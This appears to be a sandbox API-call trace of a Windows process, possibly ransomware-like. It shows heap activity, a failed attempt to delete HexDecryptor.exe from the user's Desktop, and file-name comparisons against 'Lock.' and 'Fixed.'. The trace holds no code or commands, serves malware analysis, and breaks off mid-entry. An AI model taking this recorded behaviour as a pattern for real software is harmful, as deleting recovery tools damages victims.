[0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.019] CloseHandle (hObject=0x2d0) returned 1 [0165.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0165.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0165.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c7e008 | out: hHeap=0x970000) returned 1 [0165.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0165.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0165.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0165.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c8e010 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0165.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0165.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0165.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0165.033] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0165.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0165.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0165.033] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0165.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e563a8 [0165.034] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDecryptor.exe", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", lpFilePart=0x8cedf4*="HexDecryptor.exe") returned 0x28 [0165.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0165.034] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0x20 [0165.035] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe771de0e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe771de0e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexDecryptor.exe", cAlternateFileName="HEXDEC~1.EXE")) returned 0xa87250 [0165.035] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0 [0165.035] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0165.035] GetLastError () returned 0x5 [0165.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0165.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0165.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0165.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0165.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0165.035] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0165.036] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0165.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0165.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0165.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0165.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0165.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0165.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0165.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0165.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0165.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0165.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0165.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e563a8 [0165.286] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexDecryptor.exe", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", lpFilePart=0x8cf650*="HexDecryptor.exe") returned 0x28 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0165.286] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdecryptor.exe")) returned 0x20 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0165.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0165.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0165.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xIF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IF.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F.hex", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0165.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0165.287] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0165.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0165.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0165.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0165.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0165.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0165.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0165.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0165.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0165.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0165.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0165.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0165.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0165.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0165.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0165.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0165.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0165.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xIF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IF.hex", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.290] HeapFree (in: 